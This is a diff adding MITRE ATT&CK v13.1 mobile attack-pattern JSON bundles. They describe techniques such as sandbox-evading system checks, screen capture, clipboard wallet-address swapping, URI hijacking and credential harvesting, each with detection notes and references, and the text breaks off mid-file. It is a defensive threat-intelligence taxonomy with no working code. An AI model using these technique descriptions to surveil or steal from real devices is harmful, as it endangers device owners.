"https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)", + "modified": "2022-04-05T19:40:25.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Track Device Without Authorization", + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json new file mode 100644 index 0000000000000000000000000000000000000000..2d1345b32a7054f6f8580559e94a8a4284e98be6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a0995a89-fd26-4ca5-a7ce-15ee2a7c1b24", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:04.432Z", + "name": "System Checks", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware\u2019s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nHardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "created": "2022-03-30T17:53:35.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633/001", + "external_id": "T1633.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json new file mode 100644 index 0000000000000000000000000000000000000000..39087793500c8c51a68a00bf8e24e18740bda641 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--81a94fb4-b76e-427e-9650-dbd4e22ec565", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:16.029Z", + "name": "Stored Application Data", + "description": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) \n\n \n\nDue to mobile OS sandboxing, this technique is only possible in three scenarios: \n\n \n\n* An application stores files in unprotected external storage \n* An application stores files in its internal storage directory with insecure permissions (e.g. 777) \n* The adversary gains root permissions on the device ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "created": "2017-10-25T14:48:15.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1409", + "external_id": "T1409" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html", + "external_id": "AUT-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json new file mode 100644 index 0000000000000000000000000000000000000000..6813852d9b23c2f1bde52a4723b6680c34946aa0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--6b6d8958-c145-4ee1-b7b8-72e66fd69463", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:43.022Z", + "name": "Screen Capture", + "description": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view a list of apps with accessibility service privileges in the device settings. Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "created": "2019-08-08T18:34:14.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1513", + "external_id": "T1513" + }, + { + "source_name": "Android ScreenCap2 2019", + "description": "Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.", + "url": "https://developer.android.com/studio/command-line/adb" + }, + { + "source_name": "Android ScreenCap1 2019", + "description": "Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.", + "url": "https://developer.android.com/reference/android/media/projection/MediaProjectionManager" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + }, + { + "source_name": "Fortinet screencap July 2019", + "description": "Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.", + "url": "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html" + }, + { + "source_name": "Trend Micro ScreenCap July 2015", + "description": "Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html", + "external_id": "APP-40" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json new file mode 100644 index 0000000000000000000000000000000000000000..b2484fbc0b8efbaddb3a423eac103ac2e23090bd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--e57b0263-d91e-44a2-965c-ec0bff2f3d02", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:44:26.748Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.\n\nOne method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.\n\nAdversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "created": "2022-04-06T13:39:39.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641/001", + "external_id": "T1641.001" + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019.", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json new file mode 100644 index 0000000000000000000000000000000000000000..9d5a0f1ff6a660051fd1279a0361c4867a886186 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--e84098c4-1f25-4d12-89a6-497700ecf566", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:49.443Z", + "name": "URI Hijacking", + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. \n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Leo Zhang, Trend Micro", + "Steven Du, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "created": "2022-04-01T15:15:35.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635/001", + "external_id": "T1635.001" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json new file mode 100644 index 0000000000000000000000000000000000000000..233ea82527b90b9889c9d38e5bf7e2beaa5cd19a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--8e27551a-5080-4148-a584-c64348212e4f.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--8bb97d20-ab93-41ad-9962-fe0ad404c969", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "created": "2017-10-25T14:48:31.694Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1447", + "url": "https://attack.mitre.org/techniques/T1447" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html", + "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "modified": "2022-03-30T19:50:37.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Delete Device Data", + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json new file mode 100644 index 0000000000000000000000000000000000000000..ebcb84df6a1dca89a934ab6b71cd65430d676642 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--b012ac16-0dd6-4ba1-b5ab-b4a6b64437af", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:58:20.113Z", + "name": "Remote Device Management Services", + "description": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "created": "2022-04-05T19:37:15.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/001", + "external_id": "T1430.001" + }, + { + "source_name": "Krebs-Location", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018.", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "external_id": "ECO-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "external_id": "EMM-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json new file mode 100644 index 0000000000000000000000000000000000000000..8c946954fc06845cd1bf3f9adec022c712aaa73c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--9484df21-841a-425c-8529-a452795d1da3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:28:28.234Z", + "name": "Calendar Entries", + "description": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application\u2019s manifest, or `NSCalendarsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "created": "2022-04-01T12:48:27.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/001", + "external_id": "T1636.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json new file mode 100644 index 0000000000000000000000000000000000000000..c72f0b5550ec4a66400d35fc3500dbc8eae4d7df --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--ce93c3cf-f60c-4d46-ab46-f5be640ac75f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "created": "2022-04-05T20:14:17.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.001", + "url": "https://attack.mitre.org/techniques/T1521/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.", + "modified": "2022-04-05T20:14:17.310Z", + "name": "Symmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json new file mode 100644 index 0000000000000000000000000000000000000000..613d6f4ac941dee2aa7af9204436b68cd9d86285 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--9f4e064f-37aa-419c-99a6-c20e2c209f7a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T15:45:44.103Z", + "name": "Credentials from Password Store", + "description": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary 